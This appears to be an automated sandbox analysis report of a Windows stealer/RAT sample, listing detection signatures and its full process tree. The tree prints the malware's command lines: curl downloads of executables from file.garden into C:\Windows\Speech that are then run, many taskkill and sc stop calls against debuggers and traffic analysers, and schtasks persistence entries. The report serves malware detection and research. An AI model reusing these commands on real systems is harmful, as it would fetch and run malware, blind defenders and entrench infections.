Edit tour

Windows Analysis Report
UY9hUZn4CQ.exe

Overview

General Information

Sample name:	UY9hUZn4CQ.exe renamed because original name is a hash value
Original sample name:	b1921e7e0377938146532a5abbd6dda82dff5008a94f921c40f0abf6844f9112.exe
Analysis ID:	1522826
MD5:	206addac1b15931a5a6f35222eced8c8
SHA1:	297f99ca521f8a6133c39ce32d4f6e096860a4b7
SHA256:	b1921e7e0377938146532a5abbd6dda82dff5008a94f921c40f0abf6844f9112
Tags:	exezelensky-topuser-JAMESWT_MHT
Infos:

Detection

LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Schedule system process

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected DCRat

Yara detected LummaC Stealer

Yara detected PureLog Stealer

Yara detected zgRAT

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Creates an undocumented autostart registry key

Creates multiple autostart registry keys

Creates processes via WMI

Drops executables to the windows directory (C:\Windows) and starts them

Excessive usage of taskkill to terminate processes

Injects a PE file into a foreign processes

LummaC encrypted strings found

Machine Learning detection for dropped file

PE file contains section with special chars

PE file has nameless sections

Sample uses string decryption to hide its real strings

Sigma detected: Files With System Process Name In Unsuspected Locations

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to resolve many domain names, but no domain seems valid

Uses schtasks.exe or at.exe to add and modify task schedules

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality to retrieve information about pressed keystrokes

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

File is packed with WinRar

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: CurrentVersion NT Autorun Keys Modification

Sigma detected: Suspicious Schtasks From Env Var Folder

Sigma detected: Usage Of Web Request Commands And Cmdlets

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Too many similar processes found

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses taskkill to terminate processes

Classification

Process Tree

System is w10x64

UY9hUZn4CQ.exe (PID: 7304 cmdline: "C:\Users\user\Desktop\UY9hUZn4CQ.exe" MD5: 206ADDAC1B15931A5A6F35222ECED8C8)

conhost.exe (PID: 7312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7384 cmdline: C:\Windows\system32\cmd.exe /c cls MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

cmd.exe (PID: 7436 cmdline: C:\Windows\system32\cmd.exe /c color 7 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

cmd.exe (PID: 7472 cmdline: C:\Windows\system32\cmd.exe /c cls MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

cmd.exe (PID: 7904 cmdline: C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

taskkill.exe (PID: 7920 cmdline: taskkill /f /im HTTPDebuggerUI.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

WerFault.exe (PID: 8080 cmdline: C:\Windows\system32\WerFault.exe -pss -s 460 -p 2084 -ip 2084 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

cmd.exe (PID: 7952 cmdline: C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

taskkill.exe (PID: 8032 cmdline: taskkill /f /im HTTPDebuggerSvc.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

cmd.exe (PID: 7984 cmdline: C:\Windows\system32\cmd.exe /c cls MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

cmd.exe (PID: 7992 cmdline: C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

taskkill.exe (PID: 8040 cmdline: taskkill /f /im EpicGamesLauncher.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

cmd.exe (PID: 8000 cmdline: C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/1/imxyvi.bin --output C:\Windows\Speech\imxyvi.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

curl.exe (PID: 8048 cmdline: curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/1/imxyvi.bin --output C:\Windows\Speech\imxyvi.exe MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)

cmd.exe (PID: 8124 cmdline: C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

taskkill.exe (PID: 8140 cmdline: taskkill /f /im FortniteClient-Win64-Shipping.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

cmd.exe (PID: 8148 cmdline: C:\Windows\system32\cmd.exe /c taskkill /f /im Ida64.exe >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

taskkill.exe (PID: 8176 cmdline: taskkill /f /im Ida64.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

cmd.exe (PID: 6252 cmdline: C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

taskkill.exe (PID: 1180 cmdline: taskkill /f /im OllyDbg.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

imxyvi.exe (PID: 2084 cmdline: "C:\Windows\Speech\imxyvi.exe" MD5: 6E90C863F1166A43E590204D055EE08A)

WerFault.exe (PID: 8096 cmdline: C:\Windows\system32\WerFault.exe -u -p 2084 -s 380 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

cmd.exe (PID: 5868 cmdline: C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

curl.exe (PID: 7196 cmdline: curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exe MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)

cmd.exe (PID: 3976 cmdline: C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

taskkill.exe (PID: 6956 cmdline: taskkill /f /im EpicGamesLauncher.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

cmd.exe (PID: 6160 cmdline: C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg64.exe >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

taskkill.exe (PID: 564 cmdline: taskkill /f /im Dbg64.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

cmd.exe (PID: 7412 cmdline: C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg32.exe >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

taskkill.exe (PID: 7948 cmdline: taskkill /f /im Dbg32.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

physmeme.exe (PID: 7388 cmdline: "C:\Windows\Speech\physmeme.exe" MD5: D6EDF37D68DA356237AE14270B3C7A1A)

conhost.exe (PID: 7456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 8060 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

cmd.exe (PID: 7376 cmdline: C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

curl.exe (PID: 7592 cmdline: curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)

cmd.exe (PID: 7660 cmdline: C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

taskkill.exe (PID: 7296 cmdline: taskkill /f /im FortniteClient-Win64-Shipping.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

cmd.exe (PID: 7428 cmdline: C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

taskkill.exe (PID: 7364 cmdline: taskkill /f /im EpicGamesLauncher.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

cmd.exe (PID: 7416 cmdline: C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 5956 cmdline: sc stop HTTPDebuggerPro MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

kdmapper.exe (PID: 8012 cmdline: "C:\Windows\Speech\kdmapper.exe" MD5: C85ABE0E8C3C4D4C5044AEF6422B8218)

wscript.exe (PID: 4948 cmdline: "C:\Windows\System32\WScript.exe" "C:\Edge\L6lFlVnd0szYUYb26bZc.vbe" MD5: FF00E0480075B095948000BDC66E81F0)

cmd.exe (PID: 7356 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Edge\mikZxAokT1te3xOwV8iiWp5ACQVlwzi0DAV4VCgjFc4vhg.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

msedge.exe (PID: 7484 cmdline: "C:\Edge/msedge.exe" MD5: ABD343DF6FBD7334D617F76F6F050E3C)

cmd.exe (PID: 8188 cmdline: C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/build.bin --output C:\Windows\Speech\rtcore64.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

curl.exe (PID: 8132 cmdline: curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/build.bin --output C:\Windows\Speech\rtcore64.exe MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)

cmd.exe (PID: 6020 cmdline: C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

taskkill.exe (PID: 1668 cmdline: taskkill /f /im FortniteClient-Win64-Shipping.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

cmd.exe (PID: 2740 cmdline: C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

taskkill.exe (PID: 1360 cmdline: taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

cmd.exe (PID: 4428 cmdline: C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

taskkill.exe (PID: 2832 cmdline: taskkill /f /im EpicGamesLauncher.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

cmd.exe (PID: 1868 cmdline: C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

taskkill.exe (PID: 1892 cmdline: taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

rtcore64.exe (PID: 2220 cmdline: "C:\Windows\Speech\rtcore64.exe" MD5: 725EA12718261F13FB96AC192729A2A4)

conhost.exe (PID: 7220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

aspnet_regiis.exe (PID: 3768 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe" MD5: 5D1D74198D75640E889F0A577BBF31FC)

cmd.exe (PID: 2596 cmdline: C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

taskkill.exe (PID: 2788 cmdline: taskkill /f /im FortniteClient-Win64-Shipping.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

cmd.exe (PID: 2796 cmdline: C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

taskkill.exe (PID: 2916 cmdline: taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

cmd.exe (PID: 5868 cmdline: C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

taskkill.exe (PID: 7188 cmdline: taskkill /f /im EpicGamesLauncher.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

cmd.exe (PID: 5292 cmdline: C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

taskkill.exe (PID: 3952 cmdline: taskkill /f /im HTTPDebuggerUI.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

cmd.exe (PID: 4084 cmdline: C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

taskkill.exe (PID: 5364 cmdline: taskkill /f /im FortniteClient-Win64-Shipping.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

cmd.exe (PID: 4760 cmdline: C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

taskkill.exe (PID: 7476 cmdline: taskkill /f /im EpicGamesLauncher.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

cmd.exe (PID: 1424 cmdline: C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

taskkill.exe (PID: 7904 cmdline: taskkill /f /im HTTPDebuggerSvc.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

cmd.exe (PID: 4296 cmdline: C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

taskkill.exe (PID: 5096 cmdline: taskkill /f /im FortniteClient-Win64-Shipping.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

cmd.exe (PID: 4200 cmdline: C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 4220 cmdline: sc stop HTTPDebuggerPro MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

cmd.exe (PID: 4276 cmdline: C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

taskkill.exe (PID: 7228 cmdline: taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

Conhost.exe (PID: 5048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 2712 cmdline: C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

taskkill.exe (PID: 4884 cmdline: taskkill /f /im EpicGamesLauncher.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

Conhost.exe (PID: 1472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 1516 cmdline: C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

taskkill.exe (PID: 8036 cmdline: taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

cmd.exe (PID: 7696 cmdline: C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

taskkill.exe (PID: 7432 cmdline: taskkill /f /im FortniteClient-Win64-Shipping.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

cmd.exe (PID: 7412 cmdline: C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

taskkill.exe (PID: 1132 cmdline: taskkill /f /im EpicGamesLauncher.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

cmd.exe (PID: 6688 cmdline: C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

taskkill.exe (PID: 1708 cmdline: taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

cmd.exe (PID: 7428 cmdline: C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

taskkill.exe (PID: 7392 cmdline: taskkill /f /im FortniteClient-Win64-Shipping.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

cmd.exe (PID: 8152 cmdline: C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq x64dbg*" /IM * /F /T >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

taskkill.exe (PID: 6128 cmdline: taskkill /FI "IMAGENAME eq x64dbg*" /IM * /F /T MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

cmd.exe (PID: 2224 cmdline: C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

taskkill.exe (PID: 8000 cmdline: taskkill /f /im EpicGamesLauncher.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

cmd.exe (PID: 2740 cmdline: C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq x32dbg*" /IM * /F /T >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

taskkill.exe (PID: 1244 cmdline: taskkill /FI "IMAGENAME eq x32dbg*" /IM * /F /T MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

cmd.exe (PID: 1784 cmdline: C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

taskkill.exe (PID: 6668 cmdline: taskkill /f /im FortniteClient-Win64-Shipping.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

cmd.exe (PID: 1956 cmdline: C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

taskkill.exe (PID: 2972 cmdline: taskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

cmd.exe (PID: 3092 cmdline: C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

taskkill.exe (PID: 8088 cmdline: taskkill /f /im EpicGamesLauncher.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

cmd.exe (PID: 760 cmdline: C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

taskkill.exe (PID: 7424 cmdline: taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

cmd.exe (PID: 6660 cmdline: C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

taskkill.exe (PID: 4616 cmdline: taskkill /f /im FortniteClient-Win64-Shipping.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

cmd.exe (PID: 6652 cmdline: C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

taskkill.exe (PID: 5976 cmdline: taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

cmd.exe (PID: 6092 cmdline: C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

taskkill.exe (PID: 4940 cmdline: taskkill /f /im EpicGamesLauncher.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

cmd.exe (PID: 1488 cmdline: C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq charles*" /IM * /F /T >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

taskkill.exe (PID: 5980 cmdline: taskkill /FI "IMAGENAME eq charles*" /IM * /F /T MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

cmd.exe (PID: 6764 cmdline: C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

taskkill.exe (PID: 1028 cmdline: taskkill /f /im FortniteClient-Win64-Shipping.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

cmd.exe (PID: 5744 cmdline: C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

taskkill.exe (PID: 7108 cmdline: taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

cmd.exe (PID: 5304 cmdline: C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

taskkill.exe (PID: 5948 cmdline: taskkill /f /im EpicGamesLauncher.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

cmd.exe (PID: 5772 cmdline: C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ida*" /IM * /F /T >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

taskkill.exe (PID: 6700 cmdline: taskkill /FI "IMAGENAME eq ida*" /IM * /F /T MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

cmd.exe (PID: 3036 cmdline: C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

taskkill.exe (PID: 1852 cmdline: taskkill /f /im FortniteClient-Win64-Shipping.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

cmd.exe (PID: 7928 cmdline: C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

taskkill.exe (PID: 3960 cmdline: taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

cmd.exe (PID: 4460 cmdline: C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

taskkill.exe (PID: 372 cmdline: taskkill /f /im EpicGamesLauncher.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

cmd.exe (PID: 4932 cmdline: C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

taskkill.exe (PID: 4780 cmdline: taskkill /f /im FortniteClient-Win64-Shipping.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

schtasks.exe (PID: 1868 cmdline: schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 7 /tr "'C:\Users\user\AppData\Local\winlogon.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 3092 cmdline: schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Users\user\AppData\Local\winlogon.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 4616 cmdline: schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 10 /tr "'C:\Users\user\AppData\Local\winlogon.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

cmd.exe (PID: 4800 cmdline: C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

taskkill.exe (PID: 7476 cmdline: taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

cmd.exe (PID: 5400 cmdline: C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

taskkill.exe (PID: 4220 cmdline: taskkill /f /im EpicGamesLauncher.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

cmd.exe (PID: 4124 cmdline: C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 4868 cmdline: sc stop HTTPDebuggerPro MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

cmd.exe (PID: 5096 cmdline: C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerProSdk >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 4140 cmdline: sc stop HTTPDebuggerProSdk MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

cmd.exe (PID: 5048 cmdline: C:\Windows\system32\cmd.exe /c sc stop KProcessHacker3 >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 5100 cmdline: sc stop KProcessHacker3 MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

cmd.exe (PID: 8092 cmdline: C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

